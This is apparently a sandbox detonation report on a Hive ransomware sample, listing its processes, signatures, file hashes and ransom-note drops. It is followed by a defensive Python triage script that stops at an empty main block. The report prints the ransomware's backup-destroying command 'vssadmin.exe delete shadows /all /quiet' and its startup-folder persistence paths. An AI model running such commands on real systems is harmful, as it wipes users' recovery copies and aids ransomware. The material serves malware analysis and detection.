| File created | C:\Windows\winsxs\x86_microsoft-windows-a..apc-layer.resources_31bf3856ad364e35_6.1.7600.16385_en-us_c5ccee6ea35066e8\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Delays execution with timeout.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"
C:\Windows\system32\cmd.exe
cmd /c hive.bat >NUL 2>NUL
C:\Windows\system32\cmd.exe
cmd /c shadow.bat >NUL 2>NUL
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
(the two lines above repeat verbatim for 181 identical timeout.exe process entries in this span)
Network
Files
memory/3020-0-0x0000000000B10000-0x0000000000DE9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\hive.bat
| MD5 | 6358d970c3edccb57eae7dbf9f42d58f |
| SHA1 | 25b994c3b5604f4f67e1ac6250bc2f14ce690380 |
| SHA256 | 9e36401051e677f69a82ab8fbdebd6b16210ee40612c8c7fa45ceb5d7757fe50 |
| SHA512 | 44819fec7e90b903eece750d0a2de531520ed9e637e17e4a57786f9a61c6d4b95ff6072fc3530a9d35d8dc756bcfe20f80a6a07a72d35cf24b305053ae389131 |
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\shadow.bat
| MD5 | df5552357692e0cba5e69f8fbf06abb6 |
| SHA1 | 4714f1e6bb75a80a8faf69434726d176b70d7bd8 |
| SHA256 | d158f9d53e7c37eadd3b5cc1b82d095f61484e47eda2c36d9d35f31c0b4d3ff8 |
| SHA512 | a837555a1175ab515e2b43da9e493ff0ccd4366ee59defe6770327818ca9afa6f3e39ecdf5262b69253aa9e2692283ee8cebc97d58edd42e676977c7f73d143d |
C:\$Recycle.Bin\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini
| MD5 | a526b9e7c716b3489d8cc062fbce4005 |
| SHA1 | 2df502a944ff721241be20a9e449d2acd07e0312 |
| SHA256 | e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066 |
| SHA512 | d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88 |
memory/3020-73-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-85-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-558-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-1721-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-2906-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-3560-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-4326-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-4335-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-4336-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-4337-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-4338-0x0000000000B10000-0x0000000000DE9000-memory.dmp
C:\$Recycle.Bin\HOW_TO_DECRYPT.txt
| MD5 | ee4ad142674725d6d9b58c9c3bb836dc |
| SHA1 | ac9bac37131c72a549d2bf3fbd233061906d5fab |
| SHA256 | fc1f1ed6a6692d18788de47420ead7e8a1b534b015db69a39052a0a2fc30c776 |
| SHA512 | a34c547d13880b578703f52b7d3d61b1893536966204d80a9e0f60aee8851bd9f70e3d0ceb1601aa11901c6315f57128c49f2000cc4fcbc67ed92e4628e45da3 |
memory/3020-5668-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-8139-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-10988-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11884-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11885-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11887-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11890-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11891-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11894-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11895-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11897-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11899-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11901-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11903-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11905-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11907-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11909-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11912-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11914-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11916-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11918-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11920-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11923-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11925-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11927-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11929-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11931-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11933-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11935-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11937-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11939-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11942-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11944-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11946-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11948-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11951-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11953-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11975-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11978-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11980-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11982-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-12008-0x0000000000B10000-0x0000000000DE9000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 16:12
Platform
win10v2004-20240508-en
Max time kernel
1779s
Max time network
1792s
Command Line
Signatures
Detects Go variant of Hive Ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Hive
Deletes shadow copies
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Active Setup\Installed Components | N/A | N/A |
Drops file in Drivers directory
Boot or Logon Autostart Execution: Print Processors
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\spool\prtprocs\x64\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.P7EsMTWem2f4DapaPblE9Nbz88yP_gFc7vvnpVOSdzs.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
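The rows above show the three file-system behaviours that carry most of the signal in this report: a ransom note (HOW_TO_DECRYPT.txt) written into many unrelated directories, an existing file renamed to `<name>.<base64url token>.hive`, and writes into autostart folders. Note that the "Print Processors" hit in the table above is the same ransom note landing in spool\prtprocs\x64, not a DLL being registered as a print processor, so a scorer should not treat it as persistence. The script below is an added example, not part of the sandbox report or the Hive sample; it parses rows in the report's own `| Description | Indicator | Process | Target |` layout and tags each process. The Hive rows in `SAMPLE_ROWS` are copied from the tables above; the WINWORD.EXE and spoolsv.exe rows are constructed so there is benign activity to leave alone. The `.hive` token regex is generalised from the single renamed file visible here (the token length is an assumption), and the `min_note_dirs` threshold is a hypothetical tuning value.

```python
"""Score sandbox file-event rows for Hive-style ransomware behaviour."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

RANSOM_NOTE = "how_to_decrypt.txt"
# Generalised from the one renamed file visible in the report
# (desktop.ini.<43 base64url chars>.hive). The token length is an assumption,
# so any base64url run of 16 or more characters before ".hive" is accepted.
HIVE_EXT_RE = re.compile(r"\.([A-Za-z0-9_-]{16,})\.hive$")
PRINT_PROCESSOR_DIR = "\\spool\\prtprocs\\"
STARTUP_MARKERS = ("\\start menu\\programs\\startup\\", "\\microsoft\\word\\startup\\")
ROW_RE = re.compile(r"^\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|$")

# Rows in the report's "| Description | Indicator | Process | Target |" layout.
# The Hive rows are copied from the signature tables; the last two rows are
# constructed benign activity (a Word save, the spooler touching a real
# print-processor DLL) so the scorer has something to leave alone.
SAMPLE_ROWS = r"""
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.P7EsMTWem2f4DapaPblE9Nbz88yP_gFc7vvnpVOSdzs.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\prtprocs\x64\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\drivers\W32X86\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Tasks\Microsoft\Windows\PLA\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Users\Admin\Documents\report.docx | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | N/A |
| File created | C:\Windows\System32\spool\prtprocs\x64\winprint.dll | C:\Windows\System32\spoolsv.exe | N/A |
"""


@dataclass
class ProcessStats:
    note_dirs: set = field(default_factory=set)       # distinct dirs that received a ransom note
    hive_renames: int = 0                              # files renamed to <name>.<token>.hive
    hive_tokens: set = field(default_factory=set)      # the token(s) seen in those renames
    startup_touches: int = 0                           # writes into autostart folders
    print_processor_dlls: list = field(default_factory=list)


def parse_rows(text):
    """Yield (description, path, process) from report-style table rows."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            desc, path, proc, _target = m.groups()
            yield desc, path, proc


def triage(text):
    """Aggregate per-process indicators from the table rows in `text`."""
    stats = defaultdict(ProcessStats)
    for _desc, path, proc in parse_rows(text):
        s = stats[proc]
        low = path.lower()
        directory, _, name = low.rpartition("\\")
        if name == RANSOM_NOTE:
            s.note_dirs.add(directory)
        m = HIVE_EXT_RE.search(path)
        if m:
            s.hive_renames += 1
            s.hive_tokens.add(m.group(1))
        if any(marker in low for marker in STARTUP_MARKERS):
            s.startup_touches += 1
        # Print Processors persistence needs a DLL under prtprocs; a ransom
        # note written there is note spray, not a persistence mechanism.
        if PRINT_PROCESSOR_DIR in low and name.endswith(".dll"):
            s.print_processor_dlls.append(path)
    return dict(stats)


def verdict(s, min_note_dirs=3):
    """Return the tags earned by one process; min_note_dirs is a hypothetical threshold."""
    tags = []
    if len(s.note_dirs) >= min_note_dirs:
        tags.append("ransom-note-spray")
    if s.hive_renames:
        tags.append("hive-extension-rename")
    if s.startup_touches:
        tags.append("startup-folder-write")
    if s.print_processor_dlls:
        tags.append("print-processor-dll")
    return tuple(tags)


if __name__ == "__main__":
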